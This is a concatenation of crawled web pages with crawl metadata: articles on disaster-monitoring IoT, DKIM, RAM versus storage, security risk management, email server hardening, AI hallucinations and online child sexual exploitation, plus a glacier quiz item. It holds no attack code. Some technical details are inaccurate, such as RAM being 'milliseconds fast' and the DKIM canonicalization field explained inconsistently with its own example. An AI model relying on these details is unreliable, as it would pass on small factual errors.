The natural disaster detection IoT market is projected to grow from $6.6bn in 2023 to $37.3bn by 2030, at a Compound Annual Growth Rate (CAGR) of 27.85%, according to 360iResearch. Natural disasters are a growing phenomenon, due to rising temperatures and climate change. IoT has an important role to play in monitoring environments and detecting natural disasters. It can help to warn, and somewhat mitigate the risk to, vulnerable populations, wildlife and commercial centers from events such as earthquakes, landslides, tsunamis, hurricanes, flooding, wildfire and temperature extremeties. Further, technologies such as Machine Learning (ML) and Artificial Intelligence (AI) are helping to predict, measure and pre-empt environmental change. This minimizes costs both in terms of lives, businesses, and urban infrastructure. This innovative use of technology will help save lives through preventive measures and early warning systems. But while global warming is – the clue is in the name – a global concern, early detection and data insight isn’t happening at the same rate across the globe. Worryingly, in the same parts of the globe where early detection is needed most, the data to facilitate this is missing or not being gathered. With the growth of IoT connectivity, all countries should be able to utilize environmental monitoring and disaster recovery data to their advantage, but this isn’t actually the case. The Problem of Missing Data The problem of ‘missing data’ forms part of an environment research paper for iopscience. The authors report that data gaps and missing data are commonplace across real world datasets, including global disaster databases. Global disaster databases, and recorded disaster data, are increasingly utilized by decision-makers and researchers to inform disaster mitigation and climate policies. So with significant chunks of data missing, the researchers question the conclusions drawn and the risks of unreliable study results. After all, a reliable evidence base is a prerequisite for effective decision making. So why is there an inconsistency in the data that is gathered and why are some countries not collecting the data they need? There are numerous reasons cited, including technological limitations in the surveillance of disaster events (which we will explore in more detail here), and factors such as the income status of the affected country, and the types of disaster event that occur. Global databases on environmental extremes, and analysis of their impacts, is largely carried out by research organizations in western nations. This means that there is a bias towards events in these countries. It’s an ‘unnatural disaster’ that some parts of the globe are still not able to monitor and measure the environmental changes that could save lives. The commercial world is being called upon to build the infrastructure needed to supply NGO, local communities and emergency services with the information they desperately need. Fixed sensors can capture temperature change, rising water levels, earthquake shock readings; drones can monitor volcanic activity and large bodies of water. This information delivers the insight necessary to inform and reduce loss of life. However, this comes with some significant investment, namely the network infrastructure needed to transmit the data, and ongoing funding – hence there being more complete data sets from countries of higher economic GDP. If the infrastructure does not exist to support environmental monitoring, or research is inhibited by poor or intermittent cellular connectivity, what can be done? Terrestrial networks are expensive to set up, and vulnerable themselves to natural disasters. As we reported in an earlier blog post, during a prolonged spell of rain in 2022, 1,200 cell towers were impacted in South Africa alone due flooding and landslides. Many countries and localities are simply not equipped to provide the power or networking to support cellular IoT. Not only is network coverage much lower in least developed countries than in the rest of the world, but mobile data usage can also be significantly more expensive. Solving the Communications Infrastructure Problem Satellite IoT can solve the communications infrastructure problem. It provides global connectivity to locations where cellular connectivity is missing or intermittent, enabling the kind of sensor data required for environmental monitoring to be transferred to and from the farthest reaches of the earth. All that’s needed is a satellite transceiver, antenna and clear view of the sky.
<urn:uuid:f4070a0d-5341-4c4e-871e-e453d99a3be3>
CC-MAIN-2024-38
https://www.groundcontrol.com/blog/data-inconsistencies-in-global-disaster-monitoring/
2024-09-20T20:57:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701423570.98/warc/CC-MAIN-20240920190822-20240920220822-00496.warc.gz
en
0.944669
855
3.171875
3
DomainKeys Identified Mail (DKIM): Improve Secure Email Deliverability and Prevent Spam DomainKeys Identified Mail (DKIM) is an email security standard that protects your domain name from email spoofing, ensures emails aren't altered during transit, and prevents outgoing emails from getting marked as spam. DKIM attaches a digital signature to the email and provides a key for destination servers to authenticate the signature. The DKIM authentication method proves the legitimacy of an email and improves the chances of protecting your domain name from harmful impersonations. How Does DKIM Work? DKIM creates and attaches a digital signature to every outgoing email. This signature verifies the email is authentic to the receiving email server. But how can servers confirm the signature is legitimate and not a forgery? The answer is by using cryptography keys. DKIM generates two keys: a private key and a public key. The private key is kept on the outgoing email server, and its purpose is to provide a signature to outgoing emails. The public key is kept on the DNS server, and Internet Service Providers (ISPs) can access it when they receive a DKIM-signed email. If the keys match, the email is ordained as authentic and is delivered to the inbox. The DKIM authentication method is beneficial for both senders and recipients. Senders can ensure their emails are delivered, while recipients worry less about receiving spoofed emails or other types of spam. Why Is DKIM Important in Cybersecurity? With DKIM authentication, organizations can increase email deliverability and reduce email spoofing. Senders like DKIM because it helps ensure emails are delivered to a recipient's inbox. Recipients like DKIM because it helps keep spam and malicious emails out of their inboxes. Email servers can check the DKIM signature to determine if an organization actually sent the email. This verification process lowers the chances of emails getting marked as spam or getting blocked entirely. By adding an email authentication process like DKIM, organizations may see an improvement in email deliverability. Email spoofing is a common phishing attack, and DKIM is notable for helping prevent spoofing. Since spoofing relies on a forged sender address to trick a recipient into thinking the email is legitimate, DKIM can verify the sender's identity. What Is a DKIM Record? A DKIM record is stored in the DNS and consists of a modified TXT record. The TXT record contains the public key used to verify a DKIM-signed email. What Is a DKIM Selector? A selector is a value within the DKIM signature that points to the location of a public key within the DNS. This allows an email server to authenticate an incoming email by matching it with the right key. Since domains may have multiple public keys, the selector value ensures recipients are finding the correct key which matches their DKIM-signed email. Here is an example of what a DKIM signature looks like: DKIM-Signature: v=1; a=rsa; c=relaxed/simple; d=sampledomain.com; s=selector; email@example.com This example contains the following parts: v=1: DKIM version used by the outgoing email server a=rsa: Algorithm used to generate hash for the private and public keys c=relaxed/relaxed: Sets the canonicalization posture for the sending domain d=: Email domain of the sender s=: Selector value to find the right public key for authentication i=: Identity of the sender A DKIM signature will also include information on the headers included within the message, value of a body hash generated, and the cryptographic signature. How Does DKIM Work With SPF and DMARC? DKIM is one of three standard email authentication methods. These methods help protect against spoofing and phishing attacks. It can also help prevent authentic emails from your organization from getting marked as spam. Here is a brief overview of each email authentication method: DKIM: Adds a digital signature to outgoing messages whose authenticity is proven with a cryptography key Sender Policy Framework (SPF): Identifies servers that are authorized to send messages using the domain name Domain-Based Message Authentication, Reporting, and Conformance (DMARC): Sets up a process on what to do with emails if they don't pass DKIM or SPF authentication SPF, DKIM, and DMARC work together to authenticate and deliver emails. An organization should have all three standard email authentication methods in place but many don't implement these tools. This could turn into a costly mistake because it increases the risk of employees receiving spoofed emails and phishing scams. Traditional Email Security vs. Abnormal Security While DKIM is an important aspect of email authentication security, it can only protect so much alone. That's why it's important to also implement SPF and DMARC authentication methods. These tools work together to create a multi-layered approach to validating the authenticity of emails. Organizations shouldn't rely on built-in security from their email provider. Oftentimes, email providers don't have the advanced security protocols needed to protect inboxes against modern email threats. Abnormal Security uses modern technology to combat the ever-evolving landscape of cybercrimes. It uses behavioral analysis and contextual language clues to detect phishing and other cyberattacks. Our technology can: Integrate with the cloud Automatically remediate suspicious emails Spot suspicious login behavior Detect unusual financial requests Notice manufactured urgency To learn more about how Abnormal prevents email spoofing, request a demo today.
<urn:uuid:04083cad-9207-4841-9069-b16886e07ce8>
CC-MAIN-2024-38
https://abnormalsecurity.com/glossary/dkim
2024-09-08T15:33:20Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00760.warc.gz
en
0.905256
1,168
3.21875
3
Memory is a finite resource when it comes to both humans and computers—it’s one of the most common causes of computer issues. And if you’ve ever left the house without your keys, you know memory is one of the most common human problems, too. If you’re unclear about the different types of memory in your computer, it makes pinpointing the cause of computer problems that much harder. You might hear folks use the terms memory and storage interchangeably, but there are some important differences. Understanding how both components work can help you understand what kind of computer you need, diagnose problems you’re having, and know when it’s time to consider upgrades. The Difference Between RAM and Storage Random access memory (RAM) and storage are both forms of computer memory, but they serve different functions. What Is RAM? RAM is volatile memory used by the computer’s processor to store and quickly access data that is actively being used or processed. Volatile memory maintains data only while the device is powered on. RAM takes the form of computer chips—integrated circuits—that are either soldered directly onto the main logic board of your computer or installed in memory modules that go in sockets on your computer’s logic board. You can think of it like a desk—it’s where your computer gets work done. When you double-click on an app, open a document, or do much of anything, part of your “desk” is covered and can’t be used by anything else. As you open more files, it is like covering your desk with more and more items. Using a desk with a handful of files is easy, but a desk that is covered with a bunch of stuff gets difficult to use. What Is Computer Storage? On the other hand, storage is used for long-term data retention, like a hard disk drive (HDD) or solid state drive (SSD). Compared with RAM, this type of storage is non-volatile, which means it retains information even when a device is powered off. You can think of storage like a filing cabinet—a place next to your desk where you can retrieve information as needed. RAM vs. Storage: How Do They Compare? Speed and Performance Two of the primary differences between RAM and storage are speed and performance. RAM is significantly faster than storage. Data stored in RAM can be written and accessed almost instantly, so it’s very fast—milliseconds fast. DDR4 RAM, one of the newer types of RAM technology, is capable of a peak transfer rate of 25.6GB/s! RAM has a very fast path to the computer’s central processing unit (CPU), the brain of the computer that does most of the work. Storage, as it’s slower in comparison, is responsible for holding the operating system (OS), applications, and user data for the long term—it should still be fast, but it doesn’t need to be as fast as RAM. That said, computer storage is getting faster thanks to the popularity of SSDs. SSDs are much faster than hard drives since they use integrated circuits instead of mechanical platters that have to be read sequentially, like HDDs. SSDs use a special type of memory circuitry called non-volatile RAM (NVRAM) to store data, so those shorter term memory access points stay in place even when the computer is turned off. Even though SSDs are faster than HDDs, they’re still slower than RAM. There are two reasons for that difference in speed. First, the memory chips in SSDs are slower than those in RAM. Second, there is a bottleneck created by the interface that connects the storage device to the computer. RAM, in comparison, has a much faster interface. Capacity and Size RAM is typically smaller in capacity compared to storage. It is measured in gigabytes (GB) or terabytes (TB), whereas storage capacities can reach multiple terabytes or even petabytes. The smaller size of RAM is intentional, as it is designed to store only the data currently in use, ensuring quick access for the processor. Volatility and Persistence Another key difference is the volatility of RAM and the persistence of storage. RAM is volatile, meaning it loses its data when the power is turned off or the system is rebooted. This makes it ideal for quick data access and manipulation, but unsuitable for long-term storage. Storage is non-volatile or persistent, meaning it retains data even when the power is off, making it suitable for holding files, applications, and the operating system over extended periods. How Much RAM Do I Have? Understanding how much RAM you have might be one of your first steps for diagnosing computer performance issues. Use the following steps to confirm how much RAM your computer has installed. We’ll start with an Apple computer. Click on the Apple menu and then click About This Mac. In the screenshot below, we can see that the computer has 16GB of RAM. With a Windows 11 computer, use the following steps to see how much RAM you have installed. Open the Control Panel by clicking the Windows button and typing “control panel,” then click System and Security, and then click System. Look for the line “Installed RAM.” In the screenshot below, you can see that the computer has 32GB of RAM installed. How Much Computer Storage Do I Have? To view how much free storage space you have available on a Mac computer, use these steps. Click on the Apple menu, then System Settings, select General, and then open Storage. In the screenshot below, we’ve circled where your available storage is displayed. With a Windows 11 computer, it is also easy to view how much available storage space you have. Click the Windows button and type in “file explorer.” When File Explorer opens, click on This PC from the list of options in the left-hand pane. In the screenshot below, we’ve circled where your available storage is displayed (in this case, 200GB). How RAM and Storage Affect Your Computer’s Performance For most general-purpose uses of computers—email, writing documents, surfing the web, or watching Netflix—the RAM that comes with our computer is enough. If you own your computer for a long enough time, you might need to add a bit more to keep up with memory demands from newer apps and OSes. Specifically, more RAM makes it possible for you to use more apps, documents, and larger files at the same time. People that work with very large files like large databases, videos, and images can benefit significantly from having more RAM. If you regularly use large files, it is worth checking to see if your computer’s RAM is upgradeable. Adding More RAM to Your Computer In some situations, adding more RAM is worth the expense. For example, editing videos and high-resolution images takes a lot of memory. In addition, high-end audio recording and editing as well as some scientific work require significant RAM. However, not all computers allow you to upgrade RAM. For example, the Chromebook typically has a fixed amount of RAM, and you cannot install more. So, when you’re buying a new computer—particularly if you plan on using that computer for more than five years, make sure to 1) understand how much RAM your computer has, and, 2) if you can upgrade the computer’s RAM. When your computer’s RAM is filled up, your computer has to get creative to keep working. Specifically, your computer starts to temporarily use your hard drive or SSD as “virtual memory.” If you have relatively fast storage like an SSD, virtual memory will be fast. On the other hand, using a traditional hard drive will be fairly slow. Besides RAM, the most serious bottleneck to improving performance in your computer can be your storage. Even with plenty of RAM installed, computers need to read and write information from the storage system (i.e., the HDD or the SSD). Hard drives come in different speeds and sizes. For laptops and desktops, the most common RPM rates are between 5400–7200RPM. In some cases, you might even decide to use a 10,000RPM drive. Faster drives cost more, are louder, have greater cooling needs, and use more power, but they may be a good option. New disk technologies enable hard drives to be bigger and faster. These technologies include filling the drive with helium instead of air to reduce disk platter friction and using heat or microwaves to improve disk density, such as with heat-assisted magnetic recording (HAMR) drives and microwave-assisted magnetic recording (MAMR) drives. Today, SSDs are becoming increasingly popular for computer storage. This type of computer storage is popular because it is faster, cooler, and takes up less space than traditional hard drives. They’re also less susceptible to magnetic fields and physical jolts, which makes them great for laptops. For more about the difference between HDDs and SSDs, check out our post, “Hard Disk Drive (HDD) vs. Solid-state Drive (SSD): What’s the Diff?” Adding More Computer Storage As a user’s disk storage needs increase, typically they will look to larger drives to store more data. The first step might be to replace an existing drive with a larger, faster drive. Or you might decide to install a second drive. One approach is to use different drives for different purposes. For example, use an SSD for the operating system, and then store your business videos on a larger SSD. If more storage space is needed, you can also use an external drive, most often using USB or Thunderbolt to connect to the computer. This can be a single drive or multiple drives and might use a data storage virtualization technology such as RAID to protect the data. If you have really large amounts of data, or simply wish to make it easy to share data with others in your location or elsewhere, you might consider network-attached storage (NAS). A NAS device can hold multiple drives, typically uses a data virtualization technology like RAID, and is accessible to anyone on your local network and—if you wish—on the internet, as well. NAS devices can offer a great deal of storage and other services that typically have been offered only by dedicated network servers in the past. Back Up Early and Often As a cloud storage company, we’d be remiss not to mention that you should back up your computer. No matter how you configure your computer’s storage, remember that technology can fail (we know a thing or two about that). You always want a backup so you can restore everything easily. The best backup strategy shouldn’t be dependent on any single device, either. Your backup strategy should always include three copies of your data on two different mediums with one off-site. FAQs About Differences Between RAM and Storage Internal storage is a method of data storage that writes data to a disk, holding onto that data until it’s erased. Think of it as your computer’s brain. RAM is a method of communicating data between your device’s CPU and its internal storage. Think of it as your brain’s short-term memory and ability to multi-task. The data the RAM receives is volatile, so it will only last until it’s no longer needed, usually when you turn off the power or reset the computer. If you’re looking for better PC performance, you can upgrade either RAM or storage for a boost in performance. More RAM will make it easier for your computer to perform multiple tasks at once, while upgrading your storage will improve battery life, make it faster to open applications and files, and give you more space for photos and applications. This is especially true if you’re switching your storage from a hard disk drive (HDD) to a solid state drive (SSD). More RAM does not provide you with more free space. If your computer is giving you notifications that you’re getting close to running out of storage or you’ve already started having to delete files to make room for new ones, you should upgrade the internal storage, not the RAM. Memory and storage are also not the same thing, even though the words are often used interchangeably. Memory is another term for RAM.
<urn:uuid:3c0c6a3d-1650-4803-afcb-5178e126b165>
CC-MAIN-2024-38
https://www.backblaze.com/blog/whats-diff-ram-vs-storage/
2024-09-13T14:28:06Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00360.warc.gz
en
0.938816
2,595
3.390625
3
Perfect security is not possible, feasible nor required by law. In fact, information security laws and regulations require that we provide “reasonable and appropriate” security through a well-defined risk management process. Without a risk-based approach, organizations attempt to address information security requirements by either attempting to comply with a long list of security controls, or by investing in the security threats that most recently made the news. But regulations are written so that organizations can thoughtfully consider what threats are foreseeable, and what the potential impacts would be. Security controls should then be applied to bring those risks down to a level that the organization could accept. Organizations care about information security not only because they need their systems and information to be secured, but because they want to avoid the impacts of a security breach. In the U.S., the impacts most often translate to fines, law suits and loss of business. But laws, regulations and the courts have long held that applying due care and due diligence reduces liabilities. By managing information security through a risk assessment, we not only follow the law, we ensure that our security investments are appropriate to our business. A formal information risk assessment, as described by these laws and regulations, helps management to think through which of their information assets could create problems for the public, for the organization or for their clients if compromised. When risks are calculated in terms of “impacts,” then “due care” can be defined in clear terms that are as understandable to executive management as they are by technical managers and their constituents. Moreover, security investments can be planned so that they are proportional to the risk that they address. We are in an arms race with criminals that want to disrupt business operations and steal data. These organizations have different aims but the one common theme is the unauthorized access and use of computer systems to fulfill their mission. Their missions vary but their attacks include: - Stealing and selling data (intellectual property, personally identifiable information, etc.) - Gaining control over computer resources - Spreading infections (through botnets) - Proving a point to perceived enemies - Monitoring actions and decisions of organizations and nation states - Disrupting business as political activism While we are at a disadvantage in knowing what threats will occur and when, we can protect ourselves, our interests, and the interests of our stakeholders if we systematically consider these risks and manage a plan for reducing their likelihood and impact. On the occasion that these threats do occur, we will be better prepared either to defend against them, or to reduce the impacts. This is precisely what the laws are telling us to do./maturity-assessments/ The benefits of a mature risk management system include the ability to: - Demonstrate compliance with contracts, laws, and regulations - Identify threats and risks that were previously unknown or not prioritized correctly - Differentiate from a marketing perspective - Demonstrate due care to interested parties and clients - Align the interests of IT, Executive Management, and Internal Audit - Make efficient use of limited funds to maximize security spend - Identify the biggest risks that need to be treated - Reduce/eliminate ad-hoc risk assessing from staff
<urn:uuid:9307411c-7d01-40d3-b87e-6b76c90ad0dd>
CC-MAIN-2024-38
https://www.halock.com/unlimited-security-budgets-perfect-security/
2024-09-13T14:52:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00360.warc.gz
en
0.961306
657
2.75
3
In today’s fast-paced digital world, email has become an indispensable tool for communication in both personal and professional spheres. From exchanging critical business information to connecting with friends and family, email plays a pivotal role in our daily lives. However, with the increasing reliance on email comes the need to ensure its security, integrity, and reliability. Email security is paramount to protecting sensitive data, maintaining message integrity, and thwarting potential threats such as phishing attacks, malware distribution, and unauthorized access. By implementing robust security measures, organizations can mitigate risks and safeguard their email infrastructure against evolving cyber threats. This guide explores email server security best practices and provides valuable insights for safeguarding email communications. What is a secure email server? A secure email server is a computer system responsible for sending, receiving, and storing emails securely. It ensures that email communications remain confidentia, and protected from unauthorized access or tampering. For a detailed guide on setting up an email server, you’re welcome to refer to NinjaOne’s comprehensive email server guide. The role of a secure email server extends beyond mere message delivery. It serves as a cornerstone for data integrity and confidentiality, providing a secure channel for transmitting sensitive information, confidential documents, and critical business communications. These servers implement various encryption techniques, authentication mechanisms, access controls, and monitoring systems to safeguard sensitive information transmitted via email. Key features of a secure email server - Encryption: Secure email servers use encryption protocols such as Transport Layer Security (TLS) or Pretty Good Privacy (PGP) to encrypt email messages in transit and at rest. This ensures that emails cannot be intercepted or accessed by unauthorized parties. - Authentication: Secure email servers enforce strong authentication mechanisms to verify the identities of users sending and receiving emails. This often involves multi-factor authentication (MFA) or digital certificates to prevent unauthorized access to email accounts. - Access controls: Access controls are implemented to restrict access to email accounts and ensure that only authorized users can view, send, or modify emails. Role-based access controls (RBAC) and permission settings help enforce these access restrictions. - Anti-malware and anti-spam protection: Secure email servers include built-in anti-malware and anti-spam filters to detect and block malicious attachments, phishing emails, and spam messages. These filters help prevent email-borne threats from reaching users’ inboxes. - Data Loss Prevention (DLP): DLP mechanisms are employed to prevent the unauthorized disclosure of sensitive information through email. DLP policies are able to detect and block emails that contain confidential data such as social security numbers, credit card numbers, or intellectual property. - Auditing and logging: Secure email servers maintain comprehensive audit logs of email activities, including message delivery, access attempts, and configuration changes. These logs are essential for monitoring and investigating security incidents or compliance violations. - Secure configuration: Secure email servers are configured according to industry best practices and security standards to minimize the risk of vulnerabilities and ensure a hardened security posture. This includes regular patching, disabling unnecessary services, and implementing security baselines. 10 email server security best practices In addition to the technologies leveraged by secure email servers, the following configuration best practices should be adopted to optimize overall security posture: #1. Change default passwords Default passwords pose a significant security risk as they are often easily exploited by attackers. It’s essential to change default passwords promptly upon setting up an email server to prevent unauthorized access. When creating new passwords, opt for strong and unique combinations of characters, including uppercase and lowercase letters, numbers, and special symbols. Avoid using easily guessable passwords such as “password123” or common phrases. Consider using password management tools to generate and securely store complex passwords. #2. Setup SMTP authentication SMTP (Simple Mail Transfer Protocol) authentication is a mechanism used to verify the identity of users sending emails through an email server. Enabling SMTP authentication helps prevent unauthorized users from relaying emails through the server, minimizing the risk of spamming and abuse. Configure SMTP authentication settings within your email server’s administration panel. This typically involves enabling authentication options such as SMTP AUTH (Authentication) and configuring authentication credentials for valid users. #3. Protect with MTA STS Mail Transfer Agent Strict Transport Security (MTA STS) is a security mechanism designed to enforce secure communication between mail servers, mitigating the risk of man-in-the-middle attacks and eavesdropping during email transmission. It ensures that email traffic is encrypted and authenticated, enhancing overall email security. Implementing MTA STS involves configuring your email server to support the MTA STS protocol and publishing MTA STS policies in DNS records. This enables other mail servers to verify the authenticity of your server and enforce secure connections when exchanging emails. #4. Use secure email protocols Secure email protocols such as TLS (Transport Layer Security) and SSL (Secure Sockets Layer) encrypt email data during transit, preventing interception and unauthorized access by malicious actors. It’s essential to configure your email server to use these encryption protocols to protect sensitive information. Configure your email server software to support TLS and SSL encryption for incoming and outgoing email connections. This involves enabling encryption options within the server settings and ensuring that SSL/TLS certificates are properly installed and configured. #5. Configure reverse DNS Reverse DNS (Domain Name System) is a technique used to associate IP addresses with domain names, helping verify the legitimacy of email senders and detect potential spoofing or phishing attempts. Configuring reverse DNS for your email server enhances email authenticity and security. To set up reverse DNS, contact your DNS provider or hosting provider to create and configure reverse DNS records for your email server’s IP address. Ensure that the reverse DNS records accurately reflect the hostname and domain associated with your email server. #6. Implement email firewalls Email firewalls act as a frontline defense against malicious emails, filtering out spam, phishing attempts, malware, and other email-based threats before they reach users’ inboxes. Deploying email firewalls helps protect your email server and network infrastructure from potential security breaches and data loss. There are various types of email firewalls available, including perimeter email gateways, cloud-based email security services, and software-based email filtering solutions. Choose a solution that aligns with your organization’s security requirements and integrates seamlessly with your email server. #7. Update & patch servers regularly Keeping email server software up to date is critical for addressing known vulnerabilities, bugs, and security flaws that could be exploited by attackers. Regular software updates and patches help maintain the integrity and security of your email server environment. Establish a routine schedule for applying updates and patches to your email server software, operating system, and associated components. Monitor vendor announcements, security advisories, and patch release notes to stay informed about the latest updates and security fixes. #8. Activate SPF to prevent spoofing Sender Policy Framework (SPF) is an email authentication method that helps prevent email spoofing and forged sender addresses by verifying the authenticity of email senders. By configuring SPF records for your domain, you can specify which servers are authorized to send emails on your behalf, reducing the risk of spoofed emails being delivered. To configure SPF records, access your domain’s DNS settings and add a TXT record containing the SPF policy information. Specify the IP addresses or hostnames of authorized email servers using the SPF syntax and set the appropriate SPF policy for your domain. #9. Limit access to your email server Access control measures are essential for restricting unauthorized access to your email server and preventing potential security breaches. Implement granular access controls, user authentication mechanisms, and privilege management policies to control who can access sensitive email data and server resources. Define user roles, permissions, and access levels based on job responsibilities and the principle of least privilege. Utilize username/password authentication, multi-factor authentication (MFA), and IP-based access restrictions to authenticate and authorize users for secure server management. #10. Provide training Educating employees about email security best practices is crucial for building a security-aware culture and mitigating the risk of human error-related security incidents. Develop a comprehensive training program covering various aspects of email security, including identifying phishing emails, recognizing suspicious attachments, and practicing safe email usage habits. Conduct regular training sessions, workshops, and awareness campaigns to reinforce email security awareness among employees. Provide practical examples, real-world scenarios, and interactive learning materials to engage employees and promote active participation in email security training initiatives. Enhance the resilience and integrity of your email infrastructure Email is integral to communications worldwide. However, with the convenience and ubiquity of email comes several security challenges, ranging from phishing attacks and malware distribution to data breaches and unauthorized access. Securing your email server is not just a matter of safeguarding sensitive information – it’s a fundamental aspect of maintaining business continuity, protecting customer trust, and upholding regulatory compliance standards.
<urn:uuid:6a9711cf-e54f-4900-9f46-c596502cc695>
CC-MAIN-2024-38
https://www.ninjaone.com/blog/email-server-security-best-practices/
2024-09-14T20:18:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00260.warc.gz
en
0.883007
1,871
2.921875
3
How important are Earth's fresh water reserves? What percentage of Earth’s water is found in glaciers? The correct answer is A) 2.15% Water is a precious resource that is essential for life on Earth. One of the important sources of fresh water on our planet is glaciers. These massive ice formations hold a significant amount of the Earth's freshwater reserves. Glaciers play a crucial role in regulating the global water cycle by storing water as ice and releasing it gradually over time. As temperatures rise and glaciers melt, the fresh water they contain becomes available for various purposes such as drinking water, agriculture, and hydropower generation. It is important to understand the distribution of Earth's water resources, including the percentage of water stored in glaciers. By knowing this information, scientists and policymakers can better manage and protect these valuable freshwater reserves for the benefit of current and future generations.
<urn:uuid:40abd2f0-2f68-4605-bd73-cff0c6cc99e6>
CC-MAIN-2024-38
https://bsimm2.com/sat/the-importance-of-earth-s-fresh-water-reserves.html
2024-09-17T07:59:31Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00060.warc.gz
en
0.938915
182
3.671875
4
In recent years, the rapid development of artificial intelligence (AI) has led to the rise of sophisticated language models, with OpenAI’s ChatGPT at the forefront. While these powerful tools have revolutionized various industries, they also come with their own set of challenges. One of the most concerning issues is the phenomenon of hallucination. In this article, we will demystify this term, explore why it’s a problem, and discuss ongoing efforts to mitigate it. What is hallucination in AI? Hallucination in AI refers to the generation of outputs that may sound plausible but are either factually incorrect or unrelated to the given context. These outputs often emerge from the AI model's inherent biases, lack of real-world understanding, or training data limitations. In other words, the AI system "hallucinates" information that it has not been explicitly trained on, leading to unreliable or misleading responses. Examples of AI hallucinations? Here are two examples of what hallucinations in ChatGPT might look like: User input: "When did Leonardo da Vinci paint the Mona Lisa?" AI-generated response: "Leonardo da Vinci painted the Mona Lisa in 1815." (Incorrect: The Mona Lisa was painted between 1503 and 1506, or perhaps continuing until 1517.) User input: "Tell me a fact about George Washington." AI-generated response: "George Washington was known for inventing the cotton gin." (Unrelated: Eli Whitney, not George Washington, invented the cotton gin.) Why is hallucination a problem? - Erosion of trust: When AI systems produce incorrect or misleading information, users may lose trust in the technology, hampering its adoption across various sectors. - Ethical concerns: Hallucinated outputs can potentially perpetuate harmful stereotypes or misinformation, making AI systems ethically problematic. - Impact on decision-making: AI systems are increasingly used to inform critical decisions in fields such as finance, healthcare, and law. Hallucinations can lead to poor choices with serious consequences. - Legal implications: Inaccurate or misleading outputs may expose AI developers and users to potential legal liabilities. Efforts to address hallucination in AI There are various ways these models can be improved to reduce hallucinations, these include: - Improved training data: Ensuring that AI systems are trained on diverse, accurate, and contextually relevant datasets can help minimize the occurrence of hallucinations. - Red teaming: AI developers can simulate adversarial scenarios to test the AI system's vulnerability to hallucinations and iteratively improve the model. - Transparency and explainability: Providing users with information on how the AI model works and its limitations can help them understand when to trust the system and when to seek additional verification. - Human-in-the-loop: Incorporating human reviewers to validate the AI system's outputs can mitigate the impact of hallucinations and improve the overall reliability of the technology. As ChatGPT and similar AI systems become more prevalent, addressing the phenomenon of hallucination is essential for realizing the full potential of these technologies. By understanding the causes of hallucination and investing in research to mitigate its occurrence, AI developers and users can help ensure that these powerful tools are used responsibly and effectively.
<urn:uuid:e7cca7f9-507b-40c1-b2eb-845f2715bc3e>
CC-MAIN-2024-38
https://bernardmarr.com/chatgpt-what-are-hallucinations-and-why-are-they-a-problem-for-ai-systems/
2024-09-18T12:41:12Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00860.warc.gz
en
0.92185
670
3.5625
4
Warning: This blog contains content on sexual abuse which may be triggering. It’s no surprise that the COVID-19 pandemic has increased the risk of online sexual exploitation for children. Since the global lockdown, many people are spending more time online, and so are predators – what can be more dangerous than a quarantined child sex offender having access to communicate with vulnerable children who are also confined at home? What is Online Sexual Exploitation Online child sexual exploitation refers to the usage of the internet or communication technologies as a way to facilitate the sexual abuse of children and adolescents. According to Compassion Canada, online sexual exploitation, also known as cybersex trafficking, is the act of forcing children to remove their clothes and perform unspeakable acts in front of a cell phone or computer camera. These videos are streamed to online predators from anywhere in the world in real time—in most cases, by their own parents or relatives. “In 2021, IWF investigated 361,000 reports. Of those 252,000 were confirmed to be URLs containing images or videos of child sexual abuse. The 2021 figures show a 21% rise in the number of reports investigated, and a 64% increase in the number of actioned reports.” What Does Online Child Exploitation Look Like? No child is immune to the possibility of sexual exploitation. Regardless of your age, race, gender, or background, it exists and can include a wide range of behaviours and situations. As the number of children accessing the internet increases, so does this risk of opportunities for children to be enticed and exploited. - – Online Grooming: A technique predators use to befriend or develop a relationship with a minor in order to gain their trust. This can include gifts, money, flattery, etc. - – Sextortion: Coercing a victim into giving sexually explicit material, including images or videos through threats or manipulation. - – Child Sexual Abuse Material (CSAM): Distributing, creating, sharing any images or videos of children that can be depicted as being engaged in any form of sexual activity. - – Self-generated Sexual Material: Sexually explicit content created of a child, taken by the child who is under eighteen. Who is Most at Risk? Although online sexual exploitation occurs in every country and across all levels of society, children in poverty are the most vulnerable. Predators tend to go for children who are the poorest, most desperate, and live in isolated communities. A family in poverty are sometimes limited with options. Exploiting their child, even by selling a photo, promises fast money that can earn them what they make in a year, in a week. In much of the developing world, millions of children continue to suffer sexual exploitation and are subjected to other exploitative forms including prostitution and pornography. One in particular is the Philippines. Despite updated legislation in the Philippines, including the anti-trafficking in Persons Act, Cybercrime Prevention Act, and the anti-Child Pornography Law, an increase in reports of online sexual exploitation in children in the Philippines has been recorded by The National Center for Missing and Exploited Children (NCMEC). Netsweeper’s Commitment to Combat The dark web has continued to keep up with cutting-edge technology and trends to create and distribute CSAM to further exploit children, making it difficult for governments and law enforcements to prosecute these terrible crimes. Luckily, there is now cybersecurity and software that exists to help block this disturbing content and fight against these rising threats. Netsweeper’s nFilter web filtering platform finds suspected CSAM URLs and reports them to partner organizations, including the Internet Watch Foundation and the Canadian Centre for Child Protection for investigation and further action. We are also partners with alliances including WeProtect and Project Arachnid who are dedicated to creating a digital world designed to protect children from sexual exploitation and abuse by bringing together experts and using technology that detects that will develop policies and solutions to protect children. You can read more about what Netsweeper stands for on our Social Responsibility page.
<urn:uuid:373f1f4a-c8ec-4a51-9781-544e79a3729c>
CC-MAIN-2024-38
https://www.netsweeper.com/government/children-risk-sexual-exploitation
2024-09-18T10:30:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00860.warc.gz
en
0.940982
838
3.140625
3
